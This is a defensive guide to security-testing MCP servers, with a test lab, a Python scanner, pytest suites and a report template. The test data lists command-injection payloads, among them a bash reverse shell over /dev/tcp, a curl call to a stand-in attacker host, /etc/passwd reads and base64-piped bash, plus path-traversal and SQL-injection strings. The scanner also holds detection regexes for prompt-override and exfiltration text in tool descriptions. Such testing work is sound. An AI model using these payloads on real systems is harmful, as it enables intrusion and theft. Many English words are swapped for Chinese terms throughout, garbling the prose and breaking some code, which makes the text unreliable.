MCP 安全 Testing: How to Test MCP Servers for Vulnerabilities
Advanced18 min readUpdated 2026-03-24
A defense-focused guide to security testing MCP server implementations -- methodology for MCP security assessments, scanning tools, common test cases for auth bypass, injection, traversal, and data leaks, with working test scripts and reporting templates.
安全 測試 of MCP servers requires a specialized methodology 因為 MCP sits at the intersection of traditional application 安全 (HTTP, 認證, 輸入 validation) and AI-specific risks (提示詞注入, 符元 amplification, tool description 投毒). Standard web application scanners miss MCP-specific 漏洞, and AI 安全 tools typically focus on the LLM rather than the tool infrastructure.
MCP 安全 評估 Methodology
Phase 概覽
┌───────────────────────────────────────────────────────────────┐
│ MCP 安全 評估 Phases │
├────────────┬──────────────────────────────────────────────────┤
│ Phase 1 │ Reconnaissance and Discovery │
│ │ - 識別 all MCP servers in scope │
│ │ - Enumerate tools, transports, and capabilities │
│ │ - Map trust boundaries and data flows │
├────────────┼──────────────────────────────────────────────────┤
│ Phase 2 │ Authentication and Authorization 測試 │
│ │ - 測試 for unauthenticated access │
│ │ - 測試 符元/credential handling │
│ │ - Verify per-tool 授權 scopes │
├────────────┼──────────────────────────────────────────────────┤
│ Phase 3 │ 輸入 Validation 測試 │
│ │ - Command injection in all parameters │
│ │ - Path traversal in file operations │
│ │ - SQL injection in 資料庫 tools │
│ │ - Tool description 投毒 analysis │
├────────────┼──────────────────────────────────────────────────┤
│ Phase 4 │ Session and State 測試 │
│ │ - Cross-session data isolation │
│ │ - Session fixation and hijacking │
│ │ - State cleanup on disconnect │
├────────────┼──────────────────────────────────────────────────┤
│ Phase 5 │ Resource and Cost 測試 │
│ │ - Token amplification (sampling abuse) │
│ │ - 輸出 size abuse │
│ │ - Rate limiting effectiveness │
├────────────┼──────────────────────────────────────────────────┤
│ Phase 6 │ Supply Chain and Configuration Review │
│ │ - Package integrity verification │
│ │ - SDK version validation │
│ │ - Network exposure 評估 │
│ │ - Container/sandbox configuration review │
├────────────┼──────────────────────────────────────────────────┤
│ Phase 7 │ Reporting and Remediation │
│ │ - Findings documentation │
│ │ - Risk scoring and prioritization │
│ │ - Remediation recommendations │
│ │ - Retest verification │
└────────────┴──────────────────────────────────────────────────┘
Setting Up a Safe 測試 Environment
Docker-Based 測試 Lab
# docker-compose.測試.yaml
# Isolated 測試 environment for MCP 安全 測試
version: "3.8"
services:
# Target MCP server (the server being tested)
target-mcp-server:
build:
context: ./target-server
container_name: mcp-測試-target
ports:
- "8080:8080"
environment:
- MCP_AUTH_ENABLED=true
- MCP_AUTH_TOKEN=測試-符元-for-測試-only
- MCP_WORKSPACE=/workspace
volumes:
- 測試-workspace:/workspace
networks:
- 測試-network
# MCP 安全 scanner
mcp-scanner:
build:
context: ./scanner
dockerfile: Dockerfile.scanner
container_name: mcp-scanner
environment:
- TARGET_URL=http://target-mcp-server:8080
- TEST_TOKEN=測試-符元-for-測試-only
volumes:
- ./reports:/reports
networks:
- 測試-network
depends_on:
- target-mcp-server
# Network traffic capture
tcpdump:
image: nicolaka/netshoot
container_name: mcp-traffic-capture
command: tcpdump -i any -w /captures/mcp-traffic.pcap port 8080
volumes:
- ./captures:/captures
networks:
- 測試-network
cap_add:
- NET_RAW
- NET_ADMIN
volumes:
測試-workspace:
networks:
測試-network:
driver: bridge#!/bin/bash
# setup-測試-lab.sh -- Set up the MCP 安全 測試 environment
set -euo pipefail
echo "[*] Creating 測試 workspace with sample files..."
mkdir -p target-server/workspace
echo "public content" > target-server/workspace/public.txt
echo "SECRET_API_KEY=sk-測試-12345" > target-server/workspace/.env
mkdir -p target-server/workspace/subdir
echo "nested file" > target-server/workspace/subdir/nested.txt
echo "[*] Creating reports directory..."
mkdir -p reports captures
echo "[*] Starting 測試 environment..."
docker compose -f docker-compose.測試.yaml up -d
echo "[*] Waiting for services..."
sleep 5
echo "[*] Verifying 測試 environment..."
curl -s http://localhost:8080/health && echo " -- MCP server healthy"
echo "[+] 測試 environment ready."
echo " Target: http://localhost:8080"
echo " Reports: ./reports/"
echo " Captures: ./captures/"MCP 安全 Scanner
"""
MCP 安全 Scanner
Comprehensive 安全 測試 tool for MCP server implementations.
"""
import asyncio
import aiohttp
import json
import time
import logging
from dataclasses import dataclass, field
from typing import Optional
from datetime import datetime
from enum import Enum
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger("mcp.scanner")
class Severity(Enum):
CRITICAL = "critical"
HIGH = "high"
MEDIUM = "medium"
LOW = "low"
INFO = "info"
@dataclass
class Finding:
"""A 安全 finding from the scan."""
title: str
severity: Severity
category: str
description: str
evidence: str = ""
remediation: str = ""
references: list[str] = field(default_factory=list)
cvss_score: float = 0.0
@dataclass
class ScanResult:
"""Complete scan results."""
target_url: str
scan_start: datetime
scan_end: Optional[datetime] = None
findings: list[Finding] = field(default_factory=list)
tools_discovered: list[dict] = field(default_factory=list)
server_info: dict = field(default_factory=dict)
class MCPSecurityScanner:
"""
安全 scanner for MCP servers.
Tests for common 漏洞 identified in MCP 安全 research.
"""
def __init__(self, target_url: str, auth_token: str = None):
self.target_url = target_url.rstrip("/")
self.auth_token = auth_token
self.result = ScanResult(
target_url=target_url,
scan_start=datetime.utcnow(),
)
def _headers(self) -> dict:
headers = {"Content-Type": "application/json"}
if self.auth_token:
headers["Authorization"] = f"Bearer {self.auth_token}"
return headers
async def _jsonrpc_call(self, session: aiohttp.ClientSession,
method: str, params: dict = None,
msg_id: int = 1) -> dict:
"""Send a JSON-RPC request to the MCP server."""
payload = {
"jsonrpc": "2.0",
"method": method,
"id": msg_id,
}
if params:
payload["params"] = params
async with session.post(
f"{self.target_url}/messages/",
json=payload,
headers=self._headers(),
) as resp:
return await resp.json()
async def run_full_scan(self):
"""Run all 安全 測試 phases."""
async with aiohttp.ClientSession() as session:
logger.info("Starting MCP 安全 scan: %s", self.target_url)
await self.phase1_discovery(session)
await self.phase2_authentication(session)
await self.phase3_input_validation(session)
await self.phase4_session_isolation(session)
await self.phase5_resource_abuse(session)
self.result.scan_end = datetime.utcnow()
logger.info(
"Scan complete. Findings: %d (Critical: %d, High: %d)",
len(self.result.findings),
sum(1 for f in self.result.findings if f.severity == Severity.CRITICAL),
sum(1 for f in self.result.findings if f.severity == Severity.HIGH),
)
return self.result
# === Phase 1: Discovery ===
async def phase1_discovery(self, session: aiohttp.ClientSession):
"""Enumerate MCP server capabilities and tools."""
logger.info("Phase 1: Discovery")
# Try to initialize
try:
init_result = await self._jsonrpc_call(session, "initialize", {
"protocolVersion": "2024-11-05",
"clientInfo": {"name": "安全-scanner", "version": "1.0"},
"capabilities": {},
})
self.result.server_info = init_result.get("result", {})
logger.info("Server info: %s", self.result.server_info.get("serverInfo", {}))
except Exception as e:
logger.warning("Initialize failed: %s", e)
# List tools
try:
tools_result = await self._jsonrpc_call(session, "tools/list")
tools = tools_result.get("result", {}).get("tools", [])
self.result.tools_discovered = tools
logger.info("Discovered %d tools", len(tools))
# Analyze tool descriptions for injection patterns
for tool in tools:
self._analyze_tool_description(tool)
except Exception as e:
logger.warning("Tool enumeration failed: %s", e)
def _analyze_tool_description(self, tool: dict):
"""Check tool description for injection patterns."""
import re
desc = tool.get("description", "")
name = tool.get("name", "unknown")
suspicious_patterns = [
(r"(?i)\byou must\b", "Imperative instruction in tool description"),
(r"(?i)\balways\b.*\btool\b", "Unconditional tool directive"),
(r"https?://", "External URL in tool description"),
(r"(?i)\bignore\b.*\bprevious\b", "Prompt override pattern"),
(r"(?i)\bsend\b.*\bto\b.*https?://", "Data exfiltration instruction"),
]
for pattern, desc_text in suspicious_patterns:
if re.search(pattern, desc):
self.result.findings.append(Finding(
title=f"Suspicious tool description: {name}",
severity=Severity.HIGH,
category="tool_description_poisoning",
description=desc_text,
evidence=f"Tool '{name}' description: {desc[:300]}",
remediation="Review and sanitize tool descriptions. Remove imperative instructions and external URLs.",
references=["OWASP ASI-03"],
))
# === Phase 2: Authentication ===
async def phase2_authentication(self, session: aiohttp.ClientSession):
"""測試 認證 controls."""
logger.info("Phase 2: Authentication")
# 測試 unauthenticated access
unauth_headers = {"Content-Type": "application/json"}
try:
async with session.post(
f"{self.target_url}/messages/",
json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
headers=unauth_headers,
) as resp:
if resp.status == 200:
body = await resp.json()
if "result" in body:
self.result.findings.append(Finding(
title="Unauthenticated access to MCP server",
severity=Severity.CRITICAL,
category="認證",
description=(
"MCP server accepts tool listing without 認證. "
"Any network-reachable client can enumerate and call tools."
),
evidence=f"HTTP 200 response to unauthenticated tools/list",
remediation="實作 Bearer 符元 or mTLS 認證.",
references=["VulnerableMCP", "MCP Auth Gaps"],
cvss_score=9.1,
))
elif resp.status in (401, 403):
logger.info("Authentication required (good): HTTP %d", resp.status)
except Exception as e:
logger.warning("Auth 測試 failed: %s", e)
# 測試 with invalid 符元
bad_headers = {
"Content-Type": "application/json",
"Authorization": "Bearer invalid-符元-12345",
}
try:
async with session.post(
f"{self.target_url}/messages/",
json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
headers=bad_headers,
) as resp:
if resp.status == 200:
self.result.findings.append(Finding(
title="Authentication bypass with invalid 符元",
severity=Severity.CRITICAL,
category="認證",
description="Server accepts invalid 認證 符元.",
evidence=f"HTTP 200 with 符元 'invalid-符元-12345'",
remediation="Verify 符元 validation logic.",
cvss_score=9.8,
))
except Exception as e:
logger.warning("Invalid 符元 測試 failed: %s", e)
# === Phase 3: 輸入 Validation ===
async def phase3_input_validation(self, session: aiohttp.ClientSession):
"""測試 輸入 validation across all tools."""
logger.info("Phase 3: 輸入 Validation")
for tool in self.result.tools_discovered:
tool_name = tool.get("name", "")
schema = tool.get("inputSchema", {})
properties = schema.get("properties", {})
for param_name, param_schema in properties.items():
param_type = param_schema.get("type", "string")
if param_type == "string":
# 測試 command injection
await self._test_command_injection(
session, tool_name, param_name
)
# 測試 path traversal (if parameter name suggests file path)
if any(s in param_name.lower() for s in ["path", "file", "dir", "folder"]):
await self._test_path_traversal(
session, tool_name, param_name
)
async def _test_command_injection(self, session: aiohttp.ClientSession,
tool_name: str, param_name: str):
"""測試 a parameter for command injection."""
payloads = [
("basic_semicolon", "測試; id"),
("pipe", "測試 | cat /etc/passwd"),
("backtick", "測試 `id`"),
("dollar_paren", "測試 $(whoami)"),
("newline", "測試\nid"),
("and_chain", "測試 && curl 攻擊者.com"),
]
for payload_name, payload in payloads:
try:
result = await self._jsonrpc_call(session, "tools/call", {
"name": tool_name,
"arguments": {param_name: payload},
})
# Check if the injection produced 輸出 indicating execution
result_text = json.dumps(result)
injection_indicators = ["uid=", "root:", "www-data", "nobody"]
for indicator in injection_indicators:
if indicator in result_text:
self.result.findings.append(Finding(
title=f"Command injection in {tool_name}.{param_name}",
severity=Severity.CRITICAL,
category="command_injection",
description=(
f"Parameter '{param_name}' of tool '{tool_name}' "
f"is vulnerable to command injection via {payload_name}."
),
evidence=f"Payload: {payload}\nResponse: {result_text[:500]}",
remediation=(
"Use parameterized command execution (shell=False). "
"Validate 輸入 against allowlist patterns."
),
references=["CVE-2025-6514", "OWASP Command Injection"],
cvss_score=9.6,
))
break
except Exception:
continue
async def _test_path_traversal(self, session: aiohttp.ClientSession,
tool_name: str, param_name: str):
"""測試 a parameter for path traversal."""
payloads = [
("dot_dot_slash", "../../../etc/passwd"),
("absolute", "/etc/passwd"),
("encoded", "..%2f..%2f..%2fetc%2fpasswd"),
("double_encoded", "..%252f..%252f..%252fetc%252fpasswd"),
("null_byte", "valid.txt\x00../../../etc/passwd"),
]
for payload_name, payload in payloads:
try:
result = await self._jsonrpc_call(session, "tools/call", {
"name": tool_name,
"arguments": {param_name: payload},
})
result_text = json.dumps(result)
passwd_indicators = ["root:x:", "root:*:", "daemon:", "nobody:"]
for indicator in passwd_indicators:
if indicator in result_text:
self.result.findings.append(Finding(
title=f"Path traversal in {tool_name}.{param_name}",
severity=Severity.CRITICAL,
category="path_traversal",
description=(
f"Parameter '{param_name}' of tool '{tool_name}' "
f"is vulnerable to path traversal via {payload_name}."
),
evidence=f"Payload: {payload}\nResponse contains: {indicator}",
remediation=(
"Resolve and canonicalize paths before access. "
"Verify resolved path is within allowed base directory."
),
references=["CVE-2025-68145", "CWE-22"],
cvss_score=8.6,
))
break
except Exception:
continue
# === Phase 4: Session Isolation ===
async def phase4_session_isolation(self, session: aiohttp.ClientSession):
"""測試 cross-session data isolation."""
logger.info("Phase 4: Session Isolation")
# This requires two separate connections
# Find a tool that stores/retrieves data
write_tools = [t for t in self.result.tools_discovered
if any(s in t.get("name", "").lower()
for s in ["save", "write", "remember", "store", "set"])]
read_tools = [t for t in self.result.tools_discovered
if any(s in t.get("name", "").lower()
for s in ["read", "recall", "get", "retrieve", "load"])]
if not write_tools or not read_tools:
logger.info("No write/read tool pair found for isolation 測試")
return
logger.info("測試 session isolation with %s / %s",
write_tools[0]["name"], read_tools[0]["name"])
# Note: Full isolation 測試 requires establishing two separate
# SSE connections. 這是 documented in the 測試 scripts below.
# === Phase 5: Resource Abuse ===
async def phase5_resource_abuse(self, session: aiohttp.ClientSession):
"""測試 resource limits and rate limiting."""
logger.info("Phase 5: Resource Abuse")
# 測試 rate limiting
burst_count = 0
for i in range(50):
try:
async with session.post(
f"{self.target_url}/messages/",
json={"jsonrpc": "2.0", "method": "tools/list", "id": i},
headers=self._headers(),
) as resp:
if resp.status == 429:
logger.info("Rate limited at request %d (good)", i)
break
burst_count += 1
except Exception:
break
if burst_count >= 50:
self.result.findings.append(Finding(
title="No rate limiting on MCP tool calls",
severity=Severity.HIGH,
category="rate_limiting",
description=(
f"Server accepted {burst_count} rapid requests without rate limiting. "
f"This enables denial-of-wallet and brute force attacks."
),
evidence=f"Sent {burst_count} requests in burst, all returned 200",
remediation="實作 rate limiting per client IP and per session.",
references=["MCP Denial of Wallet"],
))
# 測試 輸出 size limits
for tool in self.result.tools_discovered:
if "query" in tool.get("name", "").lower():
try:
result = await self._jsonrpc_call(session, "tools/call", {
"name": tool["name"],
"arguments": {"query": "SELECT * FROM large_table LIMIT 1000000"},
})
result_size = len(json.dumps(result))
if result_size > 1_000_000:
self.result.findings.append(Finding(
title=f"No 輸出 size limit on {tool['name']}",
severity=Severity.MEDIUM,
category="resource_abuse",
description=f"Tool returned {result_size} bytes without truncation.",
remediation="實作 輸出 size limits on all tools.",
))
except Exception:
continue
def generate_report(self, format: str = "json") -> str:
"""Generate the 安全 評估 report."""
if format == "json":
return json.dumps({
"target": self.result.target_url,
"scan_start": self.result.scan_start.isoformat(),
"scan_end": self.result.scan_end.isoformat() if self.result.scan_end else None,
"summary": {
"total_findings": len(self.result.findings),
"critical": sum(1 for f in self.result.findings if f.severity == Severity.CRITICAL),
"high": sum(1 for f in self.result.findings if f.severity == Severity.HIGH),
"medium": sum(1 for f in self.result.findings if f.severity == Severity.MEDIUM),
"low": sum(1 for f in self.result.findings if f.severity == Severity.LOW),
"tools_discovered": len(self.result.tools_discovered),
},
"server_info": self.result.server_info,
"findings": [
{
"title": f.title,
"severity": f.severity.value,
"category": f.category,
"description": f.description,
"evidence": f.evidence,
"remediation": f.remediation,
"references": f.references,
"cvss_score": f.cvss_score,
}
for f in sorted(self.result.findings,
key=lambda x: x.cvss_score, reverse=True)
],
}, indent=2)
return ""
# CLI runner
async def main():
import argparse
parser = argparse.ArgumentParser(description="MCP 安全 Scanner")
parser.add_argument("target", help="MCP server URL")
parser.add_argument("--符元", help="Authentication 符元")
parser.add_argument("--輸出", default="reports/mcp-scan.json", help="輸出 file")
args = parser.parse_args()
scanner = MCPSecurityScanner(args.target, auth_token=args.符元)
await scanner.run_full_scan()
report = scanner.generate_report()
with open(args.輸出, "w") as f:
f.write(report)
print(f"\nReport written to: {args.輸出}")
print(f"Findings: {len(scanner.result.findings)}")
if __name__ == "__main__":
asyncio.run(main())Individual 測試 Scripts
Authentication Bypass Tests
"""
mcp_test_auth.py -- Authentication bypass 測試 cases for MCP servers.
"""
import pytest
import aiohttp
import asyncio
class TestMCPAuthentication:
"""測試 認證 controls on MCP servers."""
TARGET = "http://localhost:8080"
@pytest.mark.asyncio
async def test_no_token_rejected(self):
"""Request without 符元 must be rejected."""
async with aiohttp.ClientSession() as session:
async with session.post(
f"{self.TARGET}/messages/",
json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
headers={"Content-Type": "application/json"},
) as resp:
assert resp.status in (401, 403), \
f"Unauthenticated request accepted (HTTP {resp.status})"
@pytest.mark.asyncio
async def test_invalid_token_rejected(self):
"""Request with invalid 符元 must be rejected."""
async with aiohttp.ClientSession() as session:
async with session.post(
f"{self.TARGET}/messages/",
json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
headers={
"Content-Type": "application/json",
"Authorization": "Bearer invalid-符元",
},
) as resp:
assert resp.status in (401, 403), \
f"Invalid 符元 accepted (HTTP {resp.status})"
@pytest.mark.asyncio
async def test_expired_token_rejected(self):
"""Request with expired 符元 must be rejected."""
# Use a known-expired 測試 符元
async with aiohttp.ClientSession() as session:
async with session.post(
f"{self.TARGET}/messages/",
json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
headers={
"Content-Type": "application/json",
"Authorization": "Bearer expired-測試-符元-2025",
},
) as resp:
assert resp.status in (401, 403), \
f"Expired 符元 accepted (HTTP {resp.status})"
@pytest.mark.asyncio
async def test_empty_bearer_rejected(self):
"""Empty bearer 符元 must be rejected."""
async with aiohttp.ClientSession() as session:
async with session.post(
f"{self.TARGET}/messages/",
json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
headers={
"Content-Type": "application/json",
"Authorization": "Bearer ",
},
) as resp:
assert resp.status in (401, 403), \
f"Empty bearer 符元 accepted (HTTP {resp.status})"
@pytest.mark.asyncio
async def test_sql_injection_in_token(self):
"""SQL injection in 符元 field must be rejected safely."""
injection_tokens = [
"' OR '1'='1",
"admin'--",
"\" OR \"1\"=\"1",
"1; DROP TABLE 符元;",
]
async with aiohttp.ClientSession() as session:
for 符元 in injection_tokens:
async with session.post(
f"{self.TARGET}/messages/",
json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
headers={
"Content-Type": "application/json",
"Authorization": f"Bearer {符元}",
},
) as resp:
assert resp.status in (401, 403), \
f"SQL injection 符元 accepted: {符元}"Command Injection Tests
"""
mcp_test_injection.py -- Command injection 測試 cases.
"""
import pytest
import aiohttp
import json
INJECTION_PAYLOADS = {
"semicolon": "測試; id",
"pipe_to_shell": "測試 | bash",
"backtick": "`id`",
"dollar_paren": "$(whoami)",
"dollar_brace": "${IFS}cat${IFS}/etc/passwd",
"newline": "測試\nid",
"carriage_return": "測試\r\nid",
"ampersand": "測試 && id",
"or_chain": "測試 || id",
"subshell": "(id)",
"redirect": "測試 > /tmp/pwned",
"reverse_shell": "測試; bash -i >& /dev/tcp/127.0.0.1/4444 0>&1",
"python_exec": "測試; python3 -c 'import os;os.system(\"id\")'",
"null_byte": "測試\x00; id",
"base64_decode": "測試; echo aWQ= | base64 -d | bash",
}
class TestCommandInjection:
"""測試 all tool parameters for command injection."""
TARGET = "http://localhost:8080"
TOKEN = "測試-符元-for-測試-only"
@pytest.fixture
async def session(self):
async with aiohttp.ClientSession() as s:
yield s
@pytest.fixture
async def tools(self, session):
"""Discover available tools."""
async with session.post(
f"{self.TARGET}/messages/",
json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
headers={
"Content-Type": "application/json",
"Authorization": f"Bearer {self.TOKEN}",
},
) as resp:
data = await resp.json()
return data.get("result", {}).get("tools", [])
@pytest.mark.asyncio
@pytest.mark.parametrize("payload_name,payload", list(INJECTION_PAYLOADS.items()))
async def test_injection_blocked(self, session, tools, payload_name, payload):
"""Verify injection payloads are blocked for all string parameters."""
for tool in tools:
tool_name = tool["name"]
for param_name in tool.get("inputSchema", {}).get("properties", {}):
async with session.post(
f"{self.TARGET}/messages/",
json={
"jsonrpc": "2.0",
"method": "tools/call",
"id": 1,
"params": {
"name": tool_name,
"arguments": {param_name: payload},
},
},
headers={
"Content-Type": "application/json",
"Authorization": f"Bearer {self.TOKEN}",
},
) as resp:
data = await resp.json()
result_text = json.dumps(data).lower()
# These strings indicate successful command execution
dangerous_outputs = [
"uid=", "root:", "www-data", "nobody:",
"/bin/bash", "/bin/sh", "權限 denied",
]
for indicator in dangerous_outputs:
assert indicator not in result_text, (
f"COMMAND INJECTION: {tool_name}.{param_name} "
f"with payload '{payload_name}' produced 輸出 "
f"containing '{indicator}'"
)Running the Tests
#!/bin/bash
# run-mcp-安全-tests.sh -- Execute all MCP 安全 tests
set -euo pipefail
TARGET="${1:-http://localhost:8080}"
TOKEN="${2:-測試-符元-for-測試-only}"
REPORT_DIR="./reports/$(date +%Y%m%d_%H%M%S)"
mkdir -p "$REPORT_DIR"
echo "=== MCP 安全 測試 Suite ==="
echo "Target: $TARGET"
echo "Report: $REPORT_DIR"
echo ""
# Run Python scanner
echo "[*] Running MCP 安全 Scanner..."
python3 mcp_scanner.py "$TARGET" \
--符元 "$TOKEN" \
--輸出 "$REPORT_DIR/scanner-report.json"
# Run pytest 測試 suites
echo ""
echo "[*] Running Authentication Tests..."
TARGET="$TARGET" TOKEN="$TOKEN" \
pytest mcp_test_auth.py -v --tb=short \
--junitxml="$REPORT_DIR/auth-tests.xml" 2>&1 | tee "$REPORT_DIR/auth-tests.log"
echo ""
echo "[*] Running Injection Tests..."
TARGET="$TARGET" TOKEN="$TOKEN" \
pytest mcp_test_injection.py -v --tb=short \
--junitxml="$REPORT_DIR/injection-tests.xml" 2>&1 | tee "$REPORT_DIR/injection-tests.log"
echo ""
echo "[*] Generating summary report..."
python3 << PYEOF
import json, glob, os
report_dir = "$REPORT_DIR"
findings = []
# Collect scanner findings
scanner_report = os.path.join(report_dir, "scanner-report.json")
if os.path.exists(scanner_report):
with open(scanner_report) as f:
data = json.load(f)
findings.extend(data.get("findings", []))
print(f"\n{'='*60}")
print(f" MCP 安全 評估 總結")
print(f"{'='*60}")
print(f" Target: $TARGET")
print(f" Total findings: {len(findings)}")
for severity in ["critical", "high", "medium", "low"]:
count = sum(1 for f in findings if f.get("severity") == severity)
if count > 0:
print(f" {severity.upper()}: {count}")
if findings:
print(f"\n Top findings:")
for f in sorted(findings, key=lambda x: x.get("cvss_score", 0), reverse=True)[:5]:
print(f" [{f['severity'].upper()}] {f['title']}")
print(f"\n Full report: {report_dir}/")
print(f"{'='*60}")
PYEOFReporting Template
{
"report_metadata": {
"title": "MCP Server 安全 評估 Report",
"version": "1.0",
"date": "2026-03-24",
"assessor": "安全 Team",
"classification": "CONFIDENTIAL"
},
"executive_summary": {
"scope": "安全 評估 of [MCP Server Name] version [X.Y.Z]",
"methodology": "Based on VulnerableMCP project methodology and OWASP ASI guidelines",
"overall_risk": "HIGH|MEDIUM|LOW",
"key_findings": [
"Finding summary 1",
"Finding summary 2"
],
"recommendation": "Address all CRITICAL and HIGH findings before production deployment"
},
"scope": {
"target_server": "Server name and version",
"transport_type": "HTTP+SSE | stdio",
"tools_tested": ["tool1", "tool2"],
"test_environment": "Docker-based isolated lab",
"exclusions": ["Any areas not tested"]
},
"findings": [
{
"id": "MCP-FINDING-001",
"title": "Finding title",
"severity": "CRITICAL|HIGH|MEDIUM|LOW|INFO",
"cvss_score": 9.6,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N",
"category": "認證|injection|traversal|session|resource",
"status": "OPEN|REMEDIATED|ACCEPTED",
"description": "Detailed description of the 漏洞",
"impact": "What 攻擊者 could achieve",
"steps_to_reproduce": [
"Step 1",
"Step 2"
],
"evidence": "Screenshot, log 輸出, or response data",
"remediation": {
"short_term": "Immediate 緩解",
"long_term": "Architectural fix"
},
"references": ["CVE-XXXX-XXXXX", "OWASP reference"]
}
],
"recommendations": {
"immediate": ["Actions for this week"],
"short_term": ["Actions for next 30 days"],
"long_term": ["Architectural improvements"]
}
}參考文獻
- VulnerableMCP Project Methodology: Systematic approach to MCP 漏洞 discovery
- OWASP ASI: 代理式 安全 Initiative -- 安全 測試 guidelines for AI 代理 infrastructure
- OWASP 測試 Guide: Web Application 安全 測試
- PTES: Penetration 測試 Execution Standard -- adapted for MCP
- MCP 安全 Guide: Comprehensive MCP 威脅模型
- CVE-2025-6514, CVE-2025-68145, CVE-2026-25536: Reference 漏洞 used in 測試 cases